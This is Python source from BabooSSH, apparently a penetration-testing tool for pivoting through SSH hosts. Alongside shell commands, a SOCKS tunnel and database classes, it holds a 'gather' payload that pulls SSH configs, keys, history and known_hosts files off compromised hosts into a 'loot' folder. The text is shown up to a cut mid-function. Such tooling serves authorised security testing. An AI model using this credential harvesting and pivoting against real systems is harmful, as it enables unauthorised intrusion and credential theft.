        show_all = getattr(stmt, 'all', False)
        paths = self.workspace.get_objects(paths=True)
        if not paths:
            print("No paths in current workspace")
            return
        data = []
        for path in paths:
            if not path.scope and not show_all:
                continue
            src = path.src
            if src is None:
                src = "Local"
            data.append([src, path.dst])
        print(tabulate.tabulate(data, headers=["Source", "Destination"]))

    def __path_get(self, stmt):
        endpoint = vars(stmt)['endpoint']
        as_ip = getattr(stmt, "numeric", False)
        self.workspace.path_find_existing(endpoint, as_ip)

    def __path_add(self, stmt):
        src = vars(stmt)['src']
        dst = vars(stmt)['dst']
        self.workspace.path_add(src, dst)

    def __path_del(self, stmt):
        src = vars(stmt)['src']
        dst = vars(stmt)['dst']
        self.workspace.path_del(src, dst)

    __parser_path = argparse.ArgumentParser(prog="path")
    __subparser_path = __parser_path.add_subparsers(title='Actions', help='Available actions')
    __parser_path_list = __subparser_path.add_parser("list", help='List paths')
    __parser_path_list.add_argument("-a", "--all", help="Show out of scope objects", action="store_true")
    __parser_path_get = __subparser_path.add_parser("get", help='Get path to endpoint')
    __parser_path_get.add_argument("-n", "--numeric", help="Show Endpoint instead of Host", action="store_true")
    __parser_path_get.add_argument('endpoint', help='Endpoint', choices_provider=__get_endpoint_or_host)
    __parser_path_add = __subparser_path.add_parser("add", help='Add path to endpoint')
    __parser_path_add.add_argument('src', help='Source host', choices_provider=__get_host_or_local)
    __parser_path_add.add_argument('dst', help='Destination endpoint', choices_provider=__get_option_endpoint)
    __parser_path_del = __subparser_path.add_parser("delete", help='Delete path to endpoint')
    __parser_path_del.add_argument('src', help='Source host', choices_provider=__get_host_or_local)
    __parser_path_del.add_argument('dst', help='Destination endpoint', choices_provider=__get_option_endpoint)

    __parser_path_list.set_defaults(func=__path_list)
    __parser_path_get.set_defaults(func=__path_get)
    __parser_path_add.set_defaults(func=__path_add)
    __parser_path_del.set_defaults(func=__path_del)

    @cmd2.with_argparser(__parser_path)
    @cmd2.with_category(__CMD_CAT_OBJ)
    def do_path(self, stmt):
        '''Manage paths'''
        func = getattr(stmt, 'func', None)
        if func is not None:
            # Call whatever subcommand function was selected
            func(self, stmt)
        else:
            self.__path_list(stmt)

#################################################################
###################           PROBE           ###################
#################################################################

    __parser_probe = argparse.ArgumentParser(prog="probe")
    __parser_probe.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
    __parser_probe.add_argument("-a", "--again", help="include already probed endpoints", action="store_true")
    __parser_probe.add_argument("-n", "--new", help="try finding new shorter path", action="store_true")
    __parser_probe.add_argument("-g", "--gateway", help="force specific gateway", choices_provider=__get_option_gateway)
    __parser_probe.add_argument('target', help='Endpoint to probe', nargs="?", choices_provider=__get_option_endpoint_tag)

    @cmd2.with_argparser(__parser_probe)
    @cmd2.with_category(__CMD_CAT_CON)
    def do_probe(self, stmt):
        '''Try to reach an endpoint through pivoting, using an existing path or finding a new one'''
        target = getattr(stmt, 'target', None)
        verbose = getattr(stmt, 'verbose', False)
        again = getattr(stmt, 'again', False)
        new = getattr(stmt, 'new', False)
        gateway = getattr(stmt, 'gateway', "auto")
        if gateway is None:
            gateway = "auto"

        if new and gateway != "auto":
            print("Error: You cannot use both --new and --gateway options.")
            return

        targets = self.workspace.enum_probe(target, again)
        nb_targets = len(targets)
        if nb_targets > 1:
            if not yes_no("This will probe "+str(nb_targets)+" endpoints. Proceed ?", False, list_val=targets):
                return

        self.workspace.probe(targets, gateway, verbose, find_new=new)

#################################################################
###################          CONNECT          ###################
#################################################################

    __parser_connect = argparse.ArgumentParser(prog="connect")
    __parser_connect.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
    __parser_connect.add_argument("-f", "--force", help="force connection even if already existing", action="store_true")
    __parser_connect.add_argument("-p", "--probe", help="Automatically probe the endpoint if it wasn't yet", action="store_true")
    __parser_connect.add_argument('connection', help='Connection string', nargs="?", choices_provider=__get_option_connection)

    @cmd2.with_argparser(__parser_connect)
    @cmd2.with_category(__CMD_CAT_CON)
    def do_connect(self, stmt):
        '''Try to authenticate on an Enpoint using a User and Creds'''
        connection = getattr(stmt, 'connection', None)
        verbose = getattr(stmt, 'verbose', False)
        force = getattr(stmt, 'force', False)
        probe_auto = getattr(stmt, 'probe', False)

        targets = self.workspace.enum_connect(connection, force=force, unprobed=probe_auto)
        nb_targets = len(targets)
        if nb_targets > 1:
            if not yes_no("This will attempt up to "+str(nb_targets)+" connections. Proceed ?", False, list_val=targets):
                return
        
        nb_working = self.workspace.connect(targets, verbose, probe_auto)
        print("\033[1;32m"+str(nb_working)+"/"+str(nb_targets)+"\033[0m working.")


    __parser_run = argparse.ArgumentParser(prog="run")
    __parser_run.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
    __parser_run.add_argument('connection', help='Connection string', nargs="?", choices_provider=__get_run_targets)
    __subparser_run = __parser_run.add_subparsers(title='Actions', help='Available actions')
    for __payloadName in Extensions.payloads:
        __payload = Extensions.payloads[__payloadName]
        __parser_payload = __subparser_run.add_parser(__payloadName, help=__payload.descr())
        __parser_payload.set_defaults(type=__payloadName)
        __payload.buildParser(__parser_payload)

    @cmd2.with_argparser(__parser_run)
    @cmd2.with_category(__CMD_CAT_CON)
    def do_run(self, stmt):
        '''Run a payload on a connection'''
        connection = getattr(stmt, 'connection', None)
        payload = getattr(stmt, 'type', None)
        verbose = getattr(stmt, 'verbose', False)
        self._reset_completion_defaults()

        if payload is not None:
            payload = Extensions.payloads[payload]
        else:
            payload = self.workspace.options["payload"]
            params = self.workspace.options["params"]
            __parser = argparse.ArgumentParser(description='Params __parser')
            payload.buildParser(__parser)
            if params is None:
                params = ""
            stmt, junk = __parser.parse_known_args(params.split())

        if payload is None:
            print("Error : No payload specified")
            return

        targets = self.workspace.enum_run(connection)
        nb_targets = len(targets)
        if nb_targets == 0:
            print("No valid targets found.")
            return
        if nb_targets > 1:
            if not yes_no("The payload will be run on "+str(nb_targets)+" connections. Proceed ?", False, list_val=targets):
                return

        self.workspace.run(targets, payload, stmt, verbose=verbose)

#################################################################
###################          TUNNELS          ###################
#################################################################

    def __tunnel_list(self, stmt):
        print("Current tunnels in workspace:")
        tunnels = self.workspace.tunnels.values()
        if not tunnels:
            print("No tunnels in current workspace")
            return
        data = []
        for tunnel in tunnels:
            data.append([tunnel.port, tunnel.connection])
        print(tabulate.tabulate(data, headers=["Local port", "Destination"]))

    def __tunnel_open(self, stmt):
        connection_str = getattr(stmt, 'connection', None)
        port = getattr(stmt, 'port', None)
        self.workspace.tunnel_open(connection_str, port)

    def __tunnel_close(self, stmt):
        port = getattr(stmt, 'port', None)
        self.workspace.tunnel_close(port)

    __parser_tunnel = argparse.ArgumentParser(prog="tunnel")
    __subparser_tunnel = __parser_tunnel.add_subparsers(title='Actions', help='Available actions')
    __parser_tunnel_list = __subparser_tunnel.add_parser("list", help='List tunnels')
    __parser_tunnel_open = __subparser_tunnel.add_parser("open", help='Open tunnel')
    __parser_tunnel_open.add_argument('connection', help='Connection string', choices_provider=__get_option_connection)
    __parser_tunnel_open.add_argument('port', help='Tunnel entry port', type=int, nargs='?')
    __parser_tunnel_close = __subparser_tunnel.add_parser("close", help='Close tunnel')
    __parser_tunnel_close.add_argument('port', help='Tunnel entry port', type=int, choices_provider=__get_open_tunnels)

    __parser_tunnel_list.set_defaults(func=__tunnel_list)
    __parser_tunnel_open.set_defaults(func=__tunnel_open)
    __parser_tunnel_close.set_defaults(func=__tunnel_close)

    @cmd2.with_argparser(__parser_tunnel)
    @cmd2.with_category(__CMD_CAT_CON)
    def do_tunnel(self, stmt):
        '''Manage tunnels'''
        func = getattr(stmt, 'func', None)
        if func is not None:
            # Call whatever subcommand function was selected
            func(self, stmt)
        else:
            self.__tunnel_list(None)

#################################################################
###################          EXPORTS          ###################
#################################################################


    __parser_export = argparse.ArgumentParser(prog="export")
    __subparser_export = __parser_export.add_subparsers(title='Actions', help='Available exporters')
    __parser_method = __subparser_export.add_parser('list', help='List available exporters')
    for __key in Extensions.exports:
        __export = Extensions.exports[__key]
        __parser_method = __subparser_export.add_parser(__key, help=__export.descr())
        __parser_method.set_defaults(exporter=__key)
        __export.buildParser(__parser_method)

    @cmd2.with_argparser(__parser_export)
    @cmd2.with_category(__CMD_CAT_WSP)
    def do_export(self, stmt):
        '''Export workspace info'''
        key = getattr(stmt, 'exporter', 'list')
        if key == 'list':
            print("Available exporters:")
            data = []
            for key in Extensions.exports:
                data.append([key, Extensions.exports[key].descr()])
            print(tabulate.tabulate(data, headers=["Key", "Description"]))
            return
        try:
            exporter = Extensions.exports[key]
        except Exception as exc:
            print("Error: "+str(exc))
            return
        exporter.run(stmt, self.workspace)

#################################################################
###################          IMPORTS          ###################
#################################################################

    __parser_import = argparse.ArgumentParser(prog="import")
    __subparser_import = __parser_import.add_subparsers(title='Actions', help='Available importers')
    __parser_method = __subparser_import.add_parser('list', help='List available importers')
    for __key in Extensions.imports:
        __importer = Extensions.imports[__key]
        __parser_method = __subparser_import.add_parser(__key, help=__importer.descr())
        __parser_method.set_defaults(importer=__key)
        __importer.buildParser(__parser_method)

    @cmd2.with_argparser(__parser_import)
    @cmd2.with_category(__CMD_CAT_WSP)
    def do_import(self, stmt):
        '''Import workspace info'''
        key = getattr(stmt, 'importer', 'list')
        if key == 'list':
            print("Available importers:")
            data = []
            for key in Extensions.imports:
                data.append([key, Extensions.imports[key].descr()])
            print(tabulate.tabulate(data, headers=["Key", "Description"]))
            return
        try:
            importer = Extensions.imports[key]
        except Exception as exc:
            print("Error: "+str(exc))
            return
        importer.run(stmt, self.workspace)

#################################################################
###################           SCOPE           ###################
#################################################################

    def __get_all_objects(self):
        return self.workspace.get_objects(endpoints=True, creds=True, users=True, hosts=True)

    __parser_scope = argparse.ArgumentParser(prog="scope")
    __parser_scope.add_argument('target', help='Object to scope', choices_provider=__get_all_objects)
    @cmd2.with_argparser(__parser_scope)
    @cmd2.with_category(__CMD_CAT_WSP)
    def do_scope(self, stmt):
        '''Toggle object in/out of scope'''
        key = getattr(stmt, 'target', None)
        self.workspace.scope(key)

#################################################################
###################            CMD            ###################
#################################################################

    @cmd2.with_category(__CMD_CAT_WSP)
    def do_store(self, arg):
        for obj_type, objects in self.workspace.store.items():
            print(obj_type)
            for obj_id, obj in objects.items():
                print('\t'+str(obj)+' > '+str(obj_id))



    def do_exit(self, arg):
        'Close active workspace & quit Baboossh'

        self.workspace.close()
        print("Bye !")
        return True

    def __init_prompt(self):
        'Build prompt to output currect workspace & active options'

        new_prompt = "\033[1;33m"
        new_prompt = new_prompt+"["+self.workspace.name+"]\033[1;34m"
        user = self.workspace.options["user"]
        creds = self.workspace.options["creds"]
        endpoint = self.workspace.options["endpoint"]
        payload = self.workspace.options["payload"]
        if user or endpoint or creds:
            if user:
                new_prompt = new_prompt+str(user)
            else:
                new_prompt = new_prompt+"*"
            new_prompt = new_prompt+":"
            if creds:
                new_prompt = new_prompt+str(creds)
            else:
                new_prompt = new_prompt+"*"
            new_prompt = new_prompt+"@"
            if endpoint:
                new_prompt = new_prompt+str(endpoint)
            else:
                new_prompt = new_prompt+"*"
        if payload:
            new_prompt = new_prompt+"\033[1;31m("+str(payload)+")\033[0m"
        self.prompt = new_prompt+"\033[1;33m>\033[0m "

    def emptyline(self):
        'Don\'t output empty line after command'


    def postcmd(self, stop, line):
        'Refresh promt after each command to reflect parameters changes'

        self.__init_prompt()
        return stop


    def __init__(self):
        'Init BabooSSH shell & cmd2.Cmd, create (if needed) & open default workspace.'

        super().__init__()

        if not os.path.exists(WORKSPACES_DIR):
            print("> First run ? Creating workspaces directory")
            os.makedirs(WORKSPACES_DIR)
        #Create default workspace if not exists
        if not os.path.exists(os.path.join(WORKSPACES_DIR, 'default')):
            Workspace.create('default')

        self.intro = '''
  %%%%%/      %%%     %%%%%.      .%%/     %%     %/   /%%%/   ,%%%/  *%%    %%
  %%   %%*   %% %%    %%   %%  %*       % %    /@*  % %%      %%      *%%    %% 
  %%%%%%    %%, %%%   %%%%%%  %    @@@@  %    /@@@  /  %%%%    %%%%   *%%%%%%%% 
  %%   %%% %%%%%%%%,  %%   %%(%          %%         %     %%%     %%% *%%    %% 
  %%%%%%  ,%%     %%  %%%%%%   %%      ,%   %#   %%   %%%%%.  %%%%%.  *%%    %%

Welcome to BabooSSH v\033[1;32m'''+BABOOSSH_VERSION+'''\033[0m. To start, use "help -v" to list commands.'''

        self.workspace = Workspace("default")
        self.__init_prompt()
        #Removes cmd2 default commands
        self.disable_command("run_pyscript", "disabled")
        self.disable_command("run_script", "disabled")
        self.disable_command("alias", "disabled")
        self.disable_command("edit", "disabled")
        self.disable_command("quit", "disabled")
        self.disable_command("macro", "disabled")
        self.disable_command("shortcuts", "disabled")
        self.quit_on_sigint = False
        #TODO remove debug
        self.debug = True



import ipaddress
import hashlib
import sqlite3
from baboossh import Db
from baboossh import Host
from baboossh.utils import Unique
from baboossh.tag import Tag

class Endpoint(metaclass=Unique):
    """A SSH endpoint

    An Endpoint is a couple of an IP address and a port on which a SSH server is
    (supposed) being run.

    Attributes:
        ip (str): The IP address of the Endpoint
        port (str): The port number of the Endpoint
        id (int): The endpoint id
        host (:class:`.Host`): The Endpoint's :class:`.Host`
        scope (bool): Whether the Endpoint is in scope or not
        reachable (bool): Whether the Endpoint was reached with `path find`
        distance (int): The number of hops to reach the Endpoint
        found (:class:`.Endpoint`): The Endpoint on which the current Endpoint was discovered
    """

    search_fields = ['ip', 'port']

    def __init__(self, ip, port):
        #check if ip is actually an IP
        ipaddress.ip_address(ip)
        if not isinstance(port, int) and not port.isdigit():
            raise ValueError("The port is not a positive integer")

        self.ip = ip
        self.__port = port
        self.host = None
        self.id = None
        self.scope = True
        self.reachable = None
        self.distance = None
        self.found = None
        self.tags = set()
        cursor = Db.get().cursor()
        cursor.execute('SELECT id, host, reachable, distance, scope, found FROM endpoints WHERE ip=? AND port=?', (self.ip, self.port))
        saved_endpoint = cursor.fetchone()
        if saved_endpoint is not None:
            self.id = saved_endpoint[0]
            self.host = Host.find_one(host_id=saved_endpoint[1])
            if saved_endpoint[2] is None:
                self.reachable = None
            else:
                self.reachable = saved_endpoint[2] != 0
            if saved_endpoint[3] is not None:
                self.distance = saved_endpoint[3]
            self.scope = saved_endpoint[4] != 0
            if saved_endpoint[5] is not None:
                self.found = Endpoint.find_one(endpoint_id=saved_endpoint[5])
            for row in cursor.execute('SELECT name FROM tags WHERE endpoint=?', (self.id, )):
                self.tags.add(row[0])
        cursor.close()

    @classmethod
    def get_id(cls, ip, port):
        return hashlib.sha256((ip+str(port)).encode()).hexdigest()

    @property
    def port(self):
        return int(self.__port)

    @port.setter
    def port(self, port):
        self.__port = int(port)

    @property
    def connection(self):
        from baboossh import Connection
        return Connection.find_one(endpoint=self)

    def save(self):
        """Save the Endpoint in database

        If the Endpoint object has an id it means it is already stored in database,
        so it is updated. Else it is inserted and the id is set in the object.

        """

        cursor = Db.get().cursor()
        if self.id is not None:
            #If we have an ID, the endpoint is already saved in the database : UPDATE
            cursor.execute('''UPDATE endpoints
                SET
                    ip = ?,
                    port = ?,
                    host = ?,
                    reachable = ?,
                    distance = ?,
                    scope = ?,
                    found = ?
                WHERE id = ?''',
                           (self.ip, self.port, self.host.id if self.host is not None else None, self.reachable, self.distance, self.scope, self.found.id if self.found is not None else None, self.id))
        else:
            #The endpoint doesn't exists in database : INSERT
            cursor.execute('''INSERT INTO endpoints(ip, port, host, reachable, distance, scope, found)
                VALUES (?, ?, ?, ?, ?, ?, ?) ''',
                           (self.ip, self.port, self.host.id if self.host is not None else None, self.reachable, self.distance, self.scope, self.found.id if self.found is not None else None))
            cursor.close()
            cursor = Db.get().cursor()
            cursor.execute('SELECT id FROM endpoints WHERE ip=? AND port=?', (self.ip, self.port))
            self.id = cursor.fetchone()[0]
        cursor.close()
        Db.get().commit()

    def delete(self):
        """Delete an Endpoint from the :class:`.Workspace`"""

        from baboossh import Path
        from baboossh import Connection
        if self.id is None:
            return {}
        from baboossh.utils import unstore_targets_merge
        del_data = {}
        if self.host is not None:
            endpoints = self.host.endpoints
            if len(endpoints) == 1:
                unstore_targets_merge(del_data, self.host.delete())
        for connection in Connection.find_all(endpoint=self):
            unstore_targets_merge(del_data, connection.delete())
        for path in Path.find_all(dst=self):
            unstore_targets_merge(del_data, path.delete())
        cursor = Db.get().cursor()
        cursor.execute('DELETE FROM tags WHERE endpoint = ?', (self.id, ))
        cursor.execute('DELETE FROM endpoints WHERE id = ?', (self.id, ))
        cursor.close()
        Db.get().commit()
        unstore_targets_merge(del_data, {"Endpoint":[type(self).get_id(self.ip, self.port)]})
        return del_data

    @classmethod
    def find_all(cls, scope=None, found=None):
        """Find all Endpoints matching the criteria

        Args:
            scope (bool):
                List Endpoints in scope (`True`), out of scope (`False`), or both (`None`)
            found (:class:`Endpoint`):
                The `Endpoint` the endpoints were discovered on

        Returns:
            A list of all `Endpoint` s in the :class:`.Workspace`
        """

        ret = []
        cursor = Db.get().cursor()
        if found is None:
            if scope is None:
                req = cursor.execute('SELECT ip, port FROM endpoints')
            else:
                req = cursor.execute('SELECT ip, port FROM endpoints WHERE scope=?', (scope, ))
        else:
            if scope is None:
                req = cursor.execute('SELECT ip, port FROM endpoints WHERE found=?', (found.id, ))
            else:
                req = cursor.execute('SELECT ip, port FROM endpoints WHERE scope=? and found=?', (scope, found.id))
        for row in req:
            ret.append(Endpoint(row[0], row[1]))
        return ret

    @classmethod
    def find_one(cls, endpoint_id=None, ip_port=None):
        """Find an `Endpoint` by its id or it's IP address:Port

        Args:
            endpoint_id (int): the `Endpoint` id to search
            ip_port (str): The IP and port as "<ip>:<port>"

        Returns:
            A single `Endpoint` or `None`.
        """

        cursor = Db.get().cursor()

        if endpoint_id is not None:
            if endpoint_id == 0:
                cursor.close()
                return None
            cursor.execute('''SELECT ip, port FROM endpoints WHERE id=?''', (endpoint_id, ))
        elif ip_port is not None:
            ip, sep, port = ip_port.partition(":")
            if port == "":
                raise ValueError
            cursor.execute('''SELECT ip, port FROM endpoints WHERE ip=? and port=?''', (ip, port))
        else:
            cursor.close()
            return None

        row = cursor.fetchone()
        cursor.close()
        if row is None:
            return None
        return Endpoint(row[0], row[1])
    
    def tag(self, tagname):
        cursor = Db.get().cursor()
        try:
            cursor.execute('''INSERT INTO tags (name, endpoint) VALUES (?, ?)''', (tagname, self.id))
        except sqlite3.IntegrityError:
            pass
        cursor.close()
        Db.get().commit()
        self.tags.add(tagname)

    def untag(self, tagname):
        cursor = Db.get().cursor()
        cursor.execute('DELETE FROM tags WHERE name = ? and endpoint = ?', (tagname, self.id))
        cursor.close()
        Db.get().commit()
        try:
            self.tags.remove(tagname)
        except KeyError:
            pass


    def __str__(self):
        return self.ip+":"+str(self.port)

    @classmethod
    def search(cls, field, val, show_all=False):
        """Search in the workspace for an `Endpoint`

        Args:
            field (str): the `Endpoint` attribute to search in
            val (str): the value to search for
            show_all (bool): whether to include out-of scope `Endpoint` s in search results

        Returns:
            A `List` of `Endpoint` s corresponding to the search.
        """

        if field not in cls.search_fields:
            raise ValueError
        ret = []
        cursor = Db.get().cursor()
        val = "%"+val+"%"
        if show_all:
            #Ok this sounds fugly, but there seems to be no way to set a column name in a parameter. The SQL injection risk is mitigated as field must be in allowed fields, but if you find something better I take it
            cursor.execute('SELECT ip, port FROM endpoints WHERE {} LIKE ?'.format(field), (val, ))
        else:
            cursor.execute('SELECT ip, port FROM endpoints WHERE scope=? and {} LIKE ?'.format(field), (True, val))
        for row in cursor:
            ret.append(Endpoint(row[0], row[1]))
        return ret



import importlib
import inspect
import os

class Extensions():
    """Load and access available extensions"""

    auths = {}
    payloads = {}
    exports = {}
    imports = {}

    @classmethod
    def load(cls):
        """Load extensions from the dedicated folder

        Load extensions and sort them according to their type:
        * Authentication Methods
        * Payloads
        * Exporter
        * Importer
        """

        nb_ext = 0
        extensions_dir = os.path.join(os.path.dirname(__file__), 'ext_dir')
        files = [f.split('.')[0] for f in os.listdir(extensions_dir) if os.path.isfile(os.path.join(extensions_dir, f)) and f[0] != '.']
        for mod in files:
            module_name = "baboossh.ext_dir."+mod
            try:
                new_module = importlib.import_module(module_name)
            except Exception as exc:
                print("Couldn't load extension "+mod+" :"+str(exc))
                continue
            else:
                for name, data in inspect.getmembers(new_module):
                    if not inspect.isclass(data):
                        continue
                    if name != "BaboosshExt":
                        continue

                    module_type = data.getModType()
                    if module_type == "auth":
                        dico = cls.auths
                    elif module_type == "payload":
                        dico = cls.payloads
                    elif module_type == "export":
                        dico = cls.exports
                    elif module_type == "import":
                        dico = cls.imports
                    else:
                        print(mod+"> module type Invalid")
                        continue
                    if data.getKey() in dico.keys():
                        print(mod+"> "+module_type+' method "'+data.getKey()+'" already registered')
                        continue
                    dico[data.getKey()] = data
                    nb_ext = nb_ext+1
        print(str(nb_ext)+" extensions loaded.")



class BaboosshExt():
    @classmethod
    def getModType(cls):
        return "auth"

    @classmethod
    def getKey(cls):
        return "password"

    @classmethod
    def descr(cls):
        return "Password authentication"

    @classmethod
    def buildParser(cls,parser):
        parser.add_argument('value',help='Password value')

    @classmethod
    def fromStatement(cls,stmt):
        return vars(stmt)['value']

    def __init__(self,creds):
        self.creds = creds

    def serialize(self):
        return self.creds

    def getKwargs(self):
        return {"password":self.creds}

    @property
    def identifier(self):
        return self.creds

    def toList(self):
        return self.creds

    def show(self):
        print("Password: "+self.creds)

    def edit(self):
        print("Nothing to edit")
    
    def delete(self):
        return



import select
import socket
import struct
from socketserver import StreamRequestHandler, ThreadingTCPServer
import threading

class SocksProxy(StreamRequestHandler):
    SOCKS_VERSION = 5

    def handle(self):
        # greeting header
        # read and unpack 2 bytes from a client
        header = self.connection.recv(2)
        version, nmethods = struct.unpack("!BB", header)

        # socks 5
        if version != self.SOCKS_VERSION:
            print("SOCKS version mismatch. Please use socks5")
            return
        assert nmethods > 0

        # get available methods
        methods = self.get_available_methods(nmethods)

        # accept only NO AUTH auth
        if 0 not in set(methods):
            # close connection
            self.server.close_request(self.request)
            return

        # send welcome message
        self.connection.sendall(struct.pack("!BB", self.SOCKS_VERSION, 0))

        # request
        version, cmd, _, address_type = struct.unpack("!BBBB", self.connection.recv(4))
        assert version == self.SOCKS_VERSION

        if address_type == 1:  # IPv4
            address = socket.inet_ntoa(self.connection.recv(4))
        elif address_type == 3:  # Domain name
            domain_length = ord(self.connection.recv(1)[0])
            address = self.connection.recv(domain_length)

        port = struct.unpack('!H', self.connection.recv(2))[0]

        # reply
        try:
            if cmd == 1:  # CONNECT
                remote = self.server.output.transport.open_channel(
                    kind="direct-tcpip",
                    dest_addr=(address, port),
                    src_addr=("", 0)
                )
            else:
                self.server.close_request(self.request)

            addr = struct.unpack("!I", socket.inet_aton(address))[0]
            port = int(port)
            reply = struct.pack("!BBBBIH", self.SOCKS_VERSION, 0, 0, address_type,
                                addr, port)

        except Exception as err:
            print(err)
            # return connection refused error
            reply = self.generate_failed_reply(address_type, 5)

        self.connection.sendall(reply)

        # establish data exchange
        if reply[1] == 0 and cmd == 1:
            self.exchange_loop(self.connection, remote)

        self.server.close_request(self.request)

    def get_available_methods(self, n):
        methods = []
        for i in range(n):
            methods.append(ord(self.connection.recv(1)))
        return methods

    def generate_failed_reply(self, address_type, error_number):
        return struct.pack("!BBBBIH", self.SOCKS_VERSION, error_number, 0, address_type, 0, 0)

    def exchange_loop(self, client, remote):
        while True:
            # wait until client or remote is available for read
            r, w, e = select.select([client, remote], [], [])

            if client in r:
                data = client.recv(4096)
                if remote.send(data) <= 0:
                    break

            if remote in r:
                data = remote.recv(4096)
                if client.send(data) <= 0:
                    break

class Tunnel():
    """Open SOCKS tunnel to a :class:`Host`

    Each tunnel is opened in distinct thread so that BabooSSH is still usable
    while the tunnel is open.

    Attributes:
        connection (:class:`.Connection`): the tunnel exit
        port (int): the tunnel entrance (local) port. Uses a random port if
            none is provided.
    """

    def __init__(self, connection, port=None):
        self.connection = connection
        if port is None:
            port = 0
        self.connection.open()
        self.connection.used_by_tunnels.append(self)
        self.server = ThreadingTCPServer(('127.0.0.1', port), SocksProxy)
        self.server.output = self.connection.conn
        ip, newport = self.server.server_address
        self.port = newport
        self.thread = threading.Thread(target=self.server.serve_forever)
        self.thread.start()
        print("Tunnel to "+str(self.connection)+" open on port "+str(self.port))

    def close(self):
        """Close a previously opened port"""
        try:
            self.connection.used_by_tunnels.remove(self)
        except:
            pass
        self.server.shutdown()
        print("Tunnel port "+str(self.port)+" closed")

    def __str__(self):
        return str(self.port)+"->"+str(self.connection)



import getpass
import sys
import os
import re
import glob
import ipaddress
import json
import subprocess
from baboossh.endpoint import Endpoint
from baboossh.user import User
from baboossh.path import Path
from baboossh.creds import Creds
from baboossh.exceptions import ConnectionClosedError

class ExtStr(type):
    def __str__(self):
        return self.getKey()

class BaboosshExt(object,metaclass=ExtStr):

    def __init__(self, connection, wspaceFolder):
        self.connection = connection
        self.wspaceFolder = wspaceFolder
        self.newCreds = []
        self.newUsers = []
        self.newEndpoints = []

        self.keysHash = {}
        for c in Creds.find_all():
            if c.creds_type != "privkey":
                continue
            path = c.obj.keypath
            p = subprocess.run(["sha1sum",path], stdout=subprocess.PIPE)
            out = p.stdout.decode("utf-8")
            h = out.split(" ",1)[0]
            self.keysHash[h] = path


    @classmethod
    def getModType(cls):
        return "payload"

    @classmethod
    def getKey(cls):
        return "gather"

    @classmethod
    def descr(cls):
        return "Gather endpoints and creds from compromised target"
    
    @classmethod
    def buildParser(cls,parser):
        pass

    @classmethod
    def run(cls, connection, wspaceFolder, stmt):
        if connection.conn is None:
            raise ConnectionClosedError
        g = cls(connection, wspaceFolder)
        try:
            g.gather()
        except Exception as e:
            print("Error : "+str(e))
            return False
        return True
    
    def gather(self):
        print("Starting gathering...")
        sys.stdout.flush()

        print("From SSH user config")
        self.gatherFromConfig()
        print("From history files")
        historyFiles = self.listHistoryFiles()
        for historyFile in historyFiles:
            print("\t -"+historyFile)
            self.gatherFromHistory(historyFile)
        print("From user keys")
        self.gatherKeys()
        print("From known_hosts")
        self.gatherFromKnown()
        print("Done !")
        print("Users :")
        for user in self.newUsers:
            print(" - "+str(user))
        print("\nCreds :")
        for creds in self.newCreds:
            print(" - "+str(creds))
        print("\nEndpoints :")
        for endpoint in self.newEndpoints:
            print(" - "+str(endpoint))

    def hostnameToIP(self,hostname,port=None):
        endpoints = []
        #Check if hostname is IP or Hostname :
        try:
            ipobj = ipaddress.ip_address(hostname)
        except ValueError:
            res = self.connection.conn.run("getent hosts "+hostname+" | awk '{ print $1 }'", hide="both", warn=True)
            ips = res.stdout.splitlines()
            for ip in ips:
                ipobj = ipaddress.ip_address(ip)
                if ipobj.is_loopback:
                    continue
                endpoint = Endpoint(ip,port if port is not None else 22)
                if endpoint.id is None:
                    endpoint.found = self.connection.endpoint
                if not self.connection.scope:
                    endpoint.scope = False
                try:
                    path = Path(self.connection.endpoint.host,endpoint)
                except ValueError:
                    pass
                else:
                    endpoint.save()
                    path.save()
                    endpoints.append(endpoint)
        else:
            if ipobj.is_loopback:
                return []
            endpoint = Endpoint(hostname,port if port is not None else 22)
            if endpoint.id is None:
                endpoint.found = self.connection.endpoint
            if not self.connection.scope:
                endpoint.scope = False
            if endpoint.id is None:
                endpoint.save()
                self.newEndpoints.append(endpoint)
            try:
                path = Path(self.connection.endpoint.host,endpoint)
            except ValueError:
                pass
            else:
                path.save()
                endpoints.append(endpoint)
        return endpoints

    def gatherFromConfig(self):
        lootFolder = os.path.join(self.wspaceFolder,"loot")
        filename = str(self.connection.endpoint).replace(":","-")+"_"+str(self.connection.user)+"_.ssh_config"
        filepath = os.path.join(lootFolder,filename)
        try:
            self.connection.conn.get(".ssh/config",filepath)
        except Exception as e:
            return None
        with open(filepath,'r',errors='replace') as f:
            data = f.read()
        lines = data.split('\n')
        curHost = None
        for line in lines:
            if line == '':
                continue
            if line[:5].lower() == "Host ".lower():
                if curHost != None and curHost["name"] != "*":
                    if "host" in curHost.keys():
                        host = curHost["host"]
                    else:
                        host = curHost["name"]
                    if "port" in curHost.keys():
                        port = curHost["port"]
                    else:
                        port=None
                    endpoints = self.hostnameToIP(host,port)
                    user = None
                    identity = None
                    if "user" in curHost.keys():
                        user = User(curHost["user"])
                        if not self.connection.scope:
                            user.scope = False
                        if user.id is None:
                            user.found = self.connection.endpoint
                            user.save()
                            self.newUsers.append(user)
                    if "identity" in curHost.keys():
                        identity = self.getKeyToCreds(curHost["identity"],".")
                curHost = {}
                curHost["name"] = line.split()[1]
            else:
                [key,val] = line.strip().split(' ',1)
                key = key.lower()
                if key == "user":
                    curHost['user'] = val
                elif key == "port":
                    curHost['port'] = val
                elif key == "hostname":
                    curHost['host'] = val
                elif key == "identityfile":
                    if val[:2] == '~/':
                        val = val[2:]
                    curHost['identity'] = val
        if curHost != None and curHost["name"] != "*":
            if "host" in curHost.keys():
                host = curHost["host"]
            else:
                host = curHost["name"]
            if "port" in curHost.keys():
                port = curHost["port"]
            else:
                port=None
            endpoints = self.hostnameToIP(host,port)
            user = None
            identity = None
            if "user" in curHost.keys():
                user = User(curHost["user"])
                if not self.connection.scope:
                    user.scope = False
                if user.id is None:
                    user.found = self.connection.endpoint
                    self.newUsers.append(user)
                    user.save()
            if "identity" in curHost.keys():
                identity = self.getKeyToCreds(curHost["identity"],".")

    def gatherFromKnown(self):
        lootFolder = os.path.join(self.wspaceFolder,"loot")
        filename = str(self.connection.endpoint).replace(':','-')+"_"+str(self.connection.user)+"_.ssh_known_hosts"
        filepath = os.path.join(lootFolder,filename)
        try:
            self.connection.conn.get(".ssh/known_hosts",filepath)
        except Exception as e:
            return None
        with open(filepath,'r',errors='replace') as f:
            data = f.read()
        lines = data.split('\n')
        for line in lines:
            if "|" in line:
                #The entry is hashed, and should be ignored
                continue
            targets = line.partition(' ')[0]
